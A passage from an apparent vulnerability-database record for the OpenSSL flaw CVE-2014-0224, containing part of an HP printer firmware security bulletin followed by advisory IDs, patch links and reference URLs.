issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (GNU/Linux)\n\niEYEARECAAYFAlOkrM4ACgkQ4B86/C0qfVn7/QCeK5T1H9dXfVQgIKSr5USqLmvq\nCtMAnjujH7e5aXfIOvxyyuB0FcSwIWCM\n=CEL7\n-----END PGP SIGNATURE-----\n. \nOpenSSL is a 3rd party product that is embedded with some HP printer\nproducts. This bulletin notifies HP Printer customers about impacted\nproducts. To obtain the updated firmware, go to www.hp.com and follow\nthese steps:\n\nSelect \"Drivers \u0026 Software\". \nEnter the appropriate product name listed in the table below into the search\nfield. \nClick on \"Search\". \nClick on the appropriate product. \nUnder \"Select operating system\" click on \"Cross operating system (BIOS,\nFirmware, Diagnostics, etc.)\"\nNote: If the \"Cross operating system ...\" link is not present, select\napplicable Windows operating system from the list. \nSelect the appropriate firmware update under \"Firmware\". \n\nFirmware Updates Table\n\nProduct Name\n Model Number\n Firmware Revision\n\nHP Color LaserJet CM4540 MFP\n CC419A, CC420A, CC421A\n v 2302963_436067 (or higher)\n\nHP Color LaserJet CP5525\n CE707A,CE708A,CE709A\n v 2302963_436070 (or higher)\n\nHP Color LaserJet Enterprise M750\n D3L08A, D3L09A, D3L10A\n v 2302963_436077 (or higher)\n\nHP Color LaserJet M651\n CZ255A, CZ256A, CZ257A, CZ258A\n v 2302963_436073 (or higher)\n\nHP Color LaserJet M680\n CZ248A, CZ249A\n v 2302963_436072 (or higher)\n\nHP Color LaserJet Flow M680\n CZ250A, CA251A\n v 2302963_436072 (or higher)\n\nHP LaserJet Enterprise 500 color MFP M575dn\n CD644A, CD645A\n v 2302963_436081 (or higher)\n\nHP LaserJet Enterprise 500 MFP M525f\n CF116A, CF117A\n v 2302963_436069 (or higher)\n\nHP LaserJet Enterprise 600 M601 Series\n CE989A, CE990A\n v 2302963_436082 (or higher)\n\nHP LaserJet Enterprise 600 M602 Series\n CE991A, CE992A, CE993A\n v 2302963_436082 (or higher)\n\nHP LaserJet Enterprise 600 M603 Series\n CE994A, CE995A, CE996A\n v 2302963_436082 (or higher)\n\nHP LaserJet Enterprise MFP M630 series\n B3G84A, B3G85A, B3G86A, J7X28A\n v 2303714_233000041 (or higher)\n\nHP LaserJet Enterprise 700 color M775 series\n CC522A, CC523A, CC524A, CF304A\n v 2302963_436079 (or higher)\n\nHP LaserJet Enterprise 700 M712 series\n CF235A, CF236A, CF238A\n v 2302963_436080 (or higher)\n\nHP LaserJet Enterprise 800 color M855\n A2W77A, A2W78A, A2W79A\n v 2302963_436076 (or higher)\n\nHP LaserJet Enterprise 800 color MFP M880\n A2W76A, A2W75A, D7P70A, D7P71A\n v 2302963_436068 (or higher)\n\nHP LaserJet Enterprise Color 500 M551 Series\n CF081A,CF082A,CF083A\n v 2302963_436083 (or higher)\n\nHP LaserJet Enterprise color flow MFP M575c\n CD646A\n v 2302963_436081 (or higher)\n\nHP LaserJet Enterprise flow M830z MFP\n CF367A\n v 2302963_436071 (or higher)\n\nHP LaserJet Enterprise flow MFP M525c\n CF118A\n v 2302963_436069 (or higher)\n\nHP LaserJet Enterprise M4555 MFP\n CE502A,CE503A, CE504A, CE738A\n v 2302963_436064 (or higher)\n\nHP LaserJet Enterprise M806\n CZ244A, CZ245A\n v 2302963_436075 (or higher)\n\nHP LaserJet Enterprise MFP M725\n CF066A, CF067A, CF068A, CF069A\n v 2302963_436078 (or higher)\n\nHP Scanjet Enterprise 8500 Document Capture Workstation\n L2717A, L2719A\n v 2302963_436065 (or higher)\n\nOfficeJet Enterprise Color MFP X585\n B5L04A, B5L05A,B5L07A\n v 2302963_436066 (or higher)\n\nOfficeJet Enterprise Color X555\n C2S11A, C2S12A\n v 2302963_436074 (or higher)\n\nHP Color LaserJet CP3525\n CC468A, CC469A, CC470A, CC471A\n v 06.183.1 (or higher)\n\nHP LaserJet M4345 Multifunction Printer\n CB425A, CB426A, CB427A, CB428A\n v 48.306.1 (or higher)\n\nHP LaserJet M5025 Multifunction Printer\n Q7840A\n v 48.306.1 (or higher)\n\nHP Color LaserJet CM6040 Multifunction Printer\n Q3938A, Q3939A\n v 52.256.1 (or higher)\n\nHP Color LaserJet Enterprise CP4525\n CC493A, CC494A, CC495A\n v 07.164.1 (or higher)\n\nHP Color LaserJet Enterprise CP4025\n CC489A, CC490A\n v 07.164.1 (or higher)\n\nHP LaserJet M5035 Multifunction Printer\n Q7829A, Q7830A, Q7831A\n v 48.306.1 (or higher)\n\nHP LaserJet M9050 Multifunction Printer\n CC395A\n v 51.256.1 (or higher)\n\nHP LaserJet M9040 Multifunction Printer\n CC394A\n v 51.256.1 (or higher)\n\nHP Color LaserJet CM4730 Multifunction Printer\n CB480A, CB481A, CB482A, CB483A\n v 50.286.1 (or higher)\n\nHP LaserJet M3035 Multifunction Printer\n CB414A, CB415A, CC476A, CC477A\n v 48.306.1 (or higher)\n\nHP 9250c Digital Sender\n CB472A\n v 48.293.1 (or higher)\n\nHP LaserJet Enterprise P3015\n CE525A,CE526A,CE527A,CE528A,CE595A\n v 07.186.1 (or higher)\n\nHP LaserJet M3027 Multifunction Printer\n CB416A, CC479A\n v 48.306.1 (or higher)\n\nHP LaserJet CM3530 Multifunction Printer\n CC519A, CC520A\n v 53.236.1 (or higher)\n\nHP Color LaserJet CP6015\n Q3931A, Q3932A, Q3933A, Q3934A, Q3935A\n v 04.203.1 (or higher)\n\nHP LaserJet P4515\n CB514A,CB515A, CB516A, CB517A\n v 04.213.1 (or higher)\n\nHP Color LaserJet CM6030 Multifunction Printer\n CE664A, CE665A\n v 52.256.1 (or higher)\n\nHP LaserJet P4015\n CB509A, CB526A, CB511A, CB510A\n v 04.213.1 (or higher)\n\nHP LaserJet P4014\n CB507A, CB506A, CB512A\n v 04.213.1 (or higher)\n\nHISTORY\nVersion:1 (rev.1) - 22 September 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy", "sources": [ { "db": "NVD", "id": "CVE-2014-0224" }, { "db": "BID", "id": "67899" }, { "db": "VULMON", "id": "CVE-2014-0224" }, { "db": "PACKETSTORM", "id": "127936" }, { "db": "PACKETSTORM", "id": "127166" }, { "db": "PACKETSTORM", "id": "127630" }, { "db": "PACKETSTORM", "id": "127422" }, { "db": "PACKETSTORM", "id": "127403" }, { "db": "PACKETSTORM", "id": "127190" }, { "db": "PACKETSTORM", "id": "128345" } ], "trust": 1.89 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0224", "trust": 2.7 }, { "db": "JUNIPER", "id": "JSA10629", "trust": 1.9 }, { "db": "CERT/CC", "id": "VU#978508", "trust": 1.9 }, { "db": "MCAFEE", "id": "SB10075", "trust": 1.9 }, { "db": "SECUNIA", "id": "59824", "trust": 1.6 }, { "db": "SECUNIA", "id": "59310", "trust": 1.6 }, { "db": "SECUNIA", "id": "59380", "trust": 1.6 }, { "db": "SECUNIA", "id": "59661", "trust": 1.6 }, { "db": "SECUNIA", "id": "59162", "trust": 1.6 }, { "db": "SECUNIA", "id": "59666", "trust": 1.6 }, { "db": "SECUNIA", "id": "59191", "trust": 1.6 }, { "db": "SECUNIA", "id": "59188", "trust": 1.6 }, { "db": "SECUNIA", "id": "60176", "trust": 1.6 }, { "db": "SECUNIA", "id": "59375", "trust": 1.6 }, { "db": "SECUNIA", "id": "59101", "trust": 1.6 }, { "db": "SECUNIA", "id": "59441", "trust": 1.6 }, { "db": "SECUNIA", "id": "59163", "trust": 1.6 }, { "db": "SECUNIA", "id": "59142", "trust": 1.6 }, { "db": "SECUNIA", "id": "59126", "trust": 1.6 }, { "db": "SECUNIA", "id": "59186", "trust": 1.6 }, { "db": "SECUNIA", "id": "60567", "trust": 1.6 }, { "db": "SECUNIA", "id": "59189", "trust": 1.6 }, { "db": "SECUNIA", "id": "59437", "trust": 1.6 }, { "db": "SECUNIA", "id": "59445", "trust": 1.6 }, { "db": "SECUNIA", "id": "58639", "trust": 1.6 }, { "db": "SECUNIA", "id": "59282", "trust": 1.6 }, { "db": "SECUNIA", "id": "59132", "trust": 1.6 }, { "db": "SECUNIA", "id": "59506", "trust": 1.6 }, { "db": "SECUNIA", "id": "59383", "trust": 1.6 }, { "db": "SECUNIA", "id": "59135", "trust": 1.6 }, { "db": "SECUNIA", "id": "59342", "trust": 1.6 }, { "db": "SECUNIA", "id": "59659", "trust": 1.6 }, { "db": "SECUNIA", "id": "59364", "trust": 1.6 }, { "db": "SECUNIA", "id": "58492", "trust": 1.6 }, { "db": "SECUNIA", "id": "60066", "trust": 1.6 }, { "db": "SECUNIA", "id": "58337", "trust": 1.6 }, { "db": "SECUNIA", "id": "60571", "trust": 1.6 }, { "db": "SECUNIA", "id": "59192", "trust": 1.6 }, { "db": "SECUNIA", "id": "58667", "trust": 1.6 }, { "db": "SECUNIA", "id": "59223", "trust": 1.6 }, { "db": "SECUNIA", "id": "59004", "trust": 1.6 }, { "db": "SECUNIA", "id": "59459", "trust": 1.6 }, { "db": "SECUNIA", "id": "59990", "trust": 1.6 }, { "db": "SECUNIA", "id": "59214", "trust": 1.6 }, { "db": "SECUNIA", "id": "59338", "trust": 1.6 }, { "db": "SECUNIA", "id": "59438", "trust": 1.6 }, { "db": "SECUNIA", "id": "59429", "trust": 1.6 }, { "db": "SECUNIA", "id": "59287", "trust": 1.6 }, { "db": "SECUNIA", "id": "60577", "trust": 1.6 }, { "db": "SECUNIA", "id": "59530", "trust": 1.6 }, { "db": "SECUNIA", "id": "59448", "trust": 1.6 }, { "db": "SECUNIA", "id": "58759", "trust": 1.6 }, { "db": "SECUNIA", "id": "59012", "trust": 1.6 }, { "db": "SECUNIA", "id": "59894", "trust": 1.6 }, { "db": "SECUNIA", "id": "59175", "trust": 1.6 }, { "db": "SECUNIA", "id": "59055", "trust": 1.6 }, { "db": "SECUNIA", "id": "59669", "trust": 1.6 }, { "db": "SECUNIA", "id": "59368", "trust": 1.6 }, { "db": "SECUNIA", "id": "59518", "trust": 1.6 }, { "db": "SECUNIA", "id": "58714", "trust": 1.6 }, { "db": "SECUNIA", "id": "58716", "trust": 1.6 }, { "db": "SECUNIA", "id": "60049", "trust": 1.6 }, { "db": "SECUNIA", "id": "59043", "trust": 1.6 }, { "db": "SECUNIA", "id": "59655", "trust": 1.6 }, { "db": "SECUNIA", "id": "59878", "trust": 1.6 }, { "db": "SECUNIA", "id": "59370", "trust": 1.6 }, { "db": "SECUNIA", "id": "59449", "trust": 1.6 }, { "db": "SECUNIA", "id": "59435", "trust": 1.6 }, { "db": "SECUNIA", "id": "59491", "trust": 1.6 }, { "db": "SECUNIA", "id": "59495", "trust": 1.6 }, { "db": "SECUNIA", "id": "59514", "trust": 1.6 }, { "db": "SECUNIA", "id": "59120", "trust": 1.6 }, { "db": "SECUNIA", "id": "58579", "trust": 1.6 }, { "db": "SECUNIA", "id": "59721", "trust": 1.6 }, { "db": "SECUNIA", "id": "59529", "trust": 1.6 }, { "db": "SECUNIA", "id": "59284", "trust": 1.6 }, { "db": "SECUNIA", "id": "59389", "trust": 1.6 }, { "db": "SECUNIA", "id": "58745", "trust": 1.6 }, { "db": "SECUNIA", "id": "59167", "trust": 1.6 }, { "db": "SECUNIA", "id": "58128", "trust": 1.6 }, { "db": "SECUNIA", "id": "58977", "trust": 1.6 }, { "db": "SECUNIA", "id": "59442", "trust": 1.6 }, { "db": "SECUNIA", "id": "59040", "trust": 1.6 }, { "db": "SECUNIA", "id": "58939", "trust": 1.6 }, { "db": "SECUNIA", "id": "59784", "trust": 1.6 }, { "db": "SECUNIA", "id": "59093", "trust": 1.6 }, { "db": "SECUNIA", "id": "59454", "trust": 1.6 }, { "db": "SECUNIA", "id": "59885", "trust": 1.6 }, { "db": "SECUNIA", "id": "58660", "trust": 1.6 }, { "db": "SECUNIA", "id": "59460", "trust": 1.6 }, { "db": "SECUNIA", "id": "59354", "trust": 1.6 }, { "db": "SECUNIA", "id": "58743", "trust": 1.6 }, { "db": "SECUNIA", "id": "59362", "trust": 1.6 }, { "db": "SECUNIA", "id": "58945", "trust": 1.6 }, { "db": "SECUNIA", "id": "59446", "trust": 1.6 }, { "db": "SECUNIA", "id": "59602", "trust": 1.6 }, { "db": "SECUNIA", "id": "59305", "trust": 1.6 }, { "db": "SECUNIA", "id": "58433", "trust": 1.6 }, { "db": "SECUNIA", "id": "59502", "trust": 1.6 }, { "db": "SECUNIA", "id": "59374", "trust": 1.6 }, { "db": "SECUNIA", "id": "59264", "trust": 1.6 }, { "db": "SECUNIA", "id": "59528", "trust": 1.6 }, { "db": "SECUNIA", "id": "58713", "trust": 1.6 }, { "db": "SECUNIA", "id": "59325", "trust": 1.6 }, { "db": "SECUNIA", "id": "59450", "trust": 1.6 }, { "db": "SECUNIA", "id": "58385", "trust": 1.6 }, { "db": "SECUNIA", "id": "60819", "trust": 1.6 }, { "db": "SECUNIA", "id": "59525", "trust": 1.6 }, { "db": "SECUNIA", "id": "59490", "trust": 1.6 }, { "db": "SECUNIA", "id": "59231", "trust": 1.6 }, { "db": "SECUNIA", "id": "59365", "trust": 1.6 }, { "db": "SECUNIA", "id": "61254", "trust": 1.6 }, { "db": "SECUNIA", "id": "59301", "trust": 1.6 }, { "db": "SECUNIA", "id": "59440", "trust": 1.6 }, { "db": "SECUNIA", "id": "59202", "trust": 1.6 }, { "db": "SECUNIA", "id": "59451", "trust": 1.6 }, { "db": "SECUNIA", "id": "59190", "trust": 1.6 }, { "db": "SECUNIA", "id": "59447", "trust": 1.6 }, { "db": "SECUNIA", "id": "59589", "trust": 1.6 }, { "db": "SECUNIA", "id": "60522", "trust": 1.6 }, { "db": "SECUNIA", "id": "58742", "trust": 1.6 }, { "db": "SECUNIA", "id": "59677", "trust": 1.6 }, { "db": "SECUNIA", "id": "59300", "trust": 1.6 }, { "db": "SECUNIA", "id": "59306", "trust": 1.6 }, { "db": "SECUNIA", "id": "61815", "trust": 1.6 }, { "db": "SECUNIA", "id": "59413", "trust": 1.6 }, { "db": "SECUNIA", "id": "59483", "trust": 1.6 }, { "db": "SECUNIA", "id": "59063", "trust": 1.6 }, { "db": "SECUNIA", "id": "58719", "trust": 1.6 }, { "db": "SECUNIA", "id": "59444", "trust": 1.6 }, { "db": "SECUNIA", "id": "59211", "trust": 1.6 }, { "db": "SECUNIA", "id": "59827", "trust": 1.6 }, { "db": "SECUNIA", "id": "59215", "trust": 1.6 }, { "db": "SECUNIA", "id": "59347", "trust": 1.6 }, { "db": "SECUNIA", "id": "58930", "trust": 1.6 }, { "db": "SECUNIA", "id": "59916", "trust": 1.6 }, { "db": "SECUNIA", "id": "58615", "trust": 1.6 }, { "db": "SIEMENS", "id": "SSA-234763", "trust": 1.6 }, { "db": "SECTRACK", "id": "1031594", "trust": 1.6 }, { "db": "SECTRACK", "id": "1031032", "trust": 1.6 }, { "db": "AUSCERT", "id": "ESB-2019.4645", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "LENOVO", "id": "LEN-24443", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201406-080", "trust": 0.6 }, { "db": "DLINK", "id": "SAP10045", "trust": 0.3 }, { "db": "DLINK", "id": "SAP10046", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10643", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10659", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-17-094-04", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03F", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03G", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03B", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03C", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03D", "trust": 0.3 }, { "db": "JVN", "id": "JVN61247051", "trust": 0.3 }, { "db": "BID", "id": "67899", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2014-0224", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127936", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127166", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127630", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127422", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127403", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127190", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128345", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0224" }, { "db": "BID", "id": "67899" }, { "db": "PACKETSTORM", "id": "127936" }, { "db": "PACKETSTORM", "id": "127166" }, { "db": "PACKETSTORM", "id": "127630" }, { "db": "PACKETSTORM", "id": "127422" }, { "db": "PACKETSTORM", "id": "127403" }, { "db": "PACKETSTORM", "id": "127190" }, { "db": "PACKETSTORM", "id": "128345" }, { "db": "CNNVD", "id": "CNNVD-201406-080" }, { "db": "NVD", "id": "CVE-2014-0224" } ] }, "id": "VAR-201406-0445", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.4594171644 }, "last_update_date": "2024-07-23T21:30:24.345000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "openssl-1.0.1h", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51081" }, { "title": "openssl-1.0.0m", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51080" }, { "title": "openssl-0.9.8za", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51079" }, { "title": "Amazon Linux AMI: ALAS-2014-351", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-351" }, { "title": "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03107 rev.3 - Certain HP LaserJet Printers, MFPs and Certain HP OfficeJet Enterprise Printers using OpenSSL, Remote Unauthorized Access", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=d0eef6c81e529a1b8e4ea4b72eaef4d0" }, { "title": "Amazon Linux AMI: ALAS-2014-350", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-350" }, { "title": "Siemens Security Advisories: Siemens Security Advisory", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=b92b65104373bc8476811ff1b99cd369" }, { "title": "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03107 rev.3 - Certain HP LaserJet Printers, MFPs and Certain HP OfficeJet Enterprise Printers using OpenSSL, Remote Unauthorized Access", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=a7d1e620ea07a6fd4d3ec24012763337" }, { "title": "Red Hat: CVE-2014-0224", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-0224" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-3" }, { "title": "HP: HPSBPI03107 rev.3 - Certain HP LaserJet Printers, MFPs and Certain HP OfficeJet Enterprise Printers using OpenSSL, Remote Unauthorized Access", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=hpsbpi03107" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-4" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-1" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-2" }, { "title": "Debian Security Advisories: DSA-2950-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=909292f2afe623fbec51f7ab6b32f790" }, { "title": "Debian CVElist Bug Report Logs: openssl: CVE-2014-0224, CVE-2014-0221, CVE-2014-0195, CVE-2014-0198, CVE-2010-5298, CVE-2014-3470", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=07d14df4883f21063a053cea8d2239c6" }, { "title": "Tenable Security Advisories: [R8] Tenable Products Affected by OpenSSL \u0027CCS Injection\u0027 Vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2014-03" }, { "title": "Amazon Linux AMI: ALAS-2014-349", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-349" }, { "title": "Debian CVElist Bug Report Logs: virtualbox: CVE-2014-6588 CVE-2014-6589 CVE-2014-6590 CVE-2014-6595 CVE-2015-0418 CVE-2015-0427", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=eee4d8c3e2b11de5b15ee65d96af6c60" }, { "title": "Symantec Security Advisories: SA80 : OpenSSL Security Advisory 05-Jun-2014", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=dd4667746d163d08265dfdd4c98e4201" }, { "title": "Citrix Security Bulletins: Citrix Security Advisory for OpenSSL Vulnerabilities (June 2014)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=afbd3a710e98424e558b1b21482abad6" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2014-0224 " }, { "title": "crochet-technologies", "trust": 0.1, "url": "https://github.com/crochet-technology/crochet-technologies " }, { "title": "openssl-ccs-cve-2014-0224", "trust": 0.1, "url": "https://github.com/ssllabs/openssl-ccs-cve-2014-0224 " }, { "title": "android-development-best-practices", "trust": 0.1, "url": "https://github.com/niharika2810/android-development-best-practices " }, { "title": "ssl-grader", "trust": 0.1, "url": "https://github.com/sslyze410-sslgrader-wciphersuite-info/ssl-grader " }, { "title": "", "trust": 0.1, "url": "https://github.com/dtarnawsky/capacitor-plugin-security-provider " }, { "title": "qualysparser", "trust": 0.1, "url": "https://github.com/pr4jwal/qualysparser " }, { "title": "", "trust": 0.1, "url": "https://github.com/wanderwille/13.01 " } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0224" }, { "db": "CNNVD", "id": "CNNVD-201406-080" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-326", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0224" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "http://support.citrix.com/article/ctx140876" }, { "trust": 2.5, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0006.html" }, { "trust": 2.2, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676615" }, { "trust": 2.2, "url": "http://www.ibm.com/support/docview.wss?uid=swg21676793" }, { "trust": 2.2, "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1020948" }, { "trust": 2.2, "url": "http://www.ibm.com/support/docview.wss?uid=swg1it02314" }, { "trust": 2.2, "url": "http://www.ibm.com/support/docview.wss?uid=swg21676877" }, { "trust": 2.2, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html" }, { "trust": 2.2, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345106.htm" }, { "trust": 2.2, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004678" }, { "trust": 2.2, "url": "http://www.ibm.com/support/docview.wss?uid=swg21676356" }, { "trust": 2.2, "url": "http://www.ibm.com/support/docview.wss?uid=swg24037783" }, { "trust": 2.0, "url": "http://www.openssl.org/news/secadv_20140605.txt" }, { "trust": 1.9, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=kb29217" }, { "trust": 1.9, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629" }, { "trust": 1.9, "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2014_0224_cryptographic_issues1" }, { "trust": 1.9, "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2014_0224_cryptographic_issues" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678167" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678233" }, { "trust": 1.9, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=kb29195" }, { "trust": 1.9, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15325.html" }, { "trust": 1.9, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory9.asc" }, { "trust": 1.9, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 1.9, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 1.9, "url": "http://www.f-secure.com/en/web/labs_global/fsc-2014-6" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037730" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037727" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676655" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675821" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676071" }, { "trust": 1.9, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095757" }, { "trust": 1.9, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095756" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676833" }, { "trust": 1.9, "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa80" }, { "trust": 1.9, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10075" }, { "trust": 1.9, "url": "http://www.fortiguard.com/advisory/fg-ir-14-018/" }, { "trust": 1.9, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140605-openssl" }, { "trust": 1.9, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "trust": 1.9, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html" }, { "trust": 1.9, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html" }, { "trust": 1.9, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020172" }, { "trust": 1.9, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675626" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2014-0630.html" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2014-0631.html" }, { "trust": 1.9, "url": "http://rhn.redhat.com/errata/rhsa-2014-0633.html" }, { "trust": 1.9, "url": 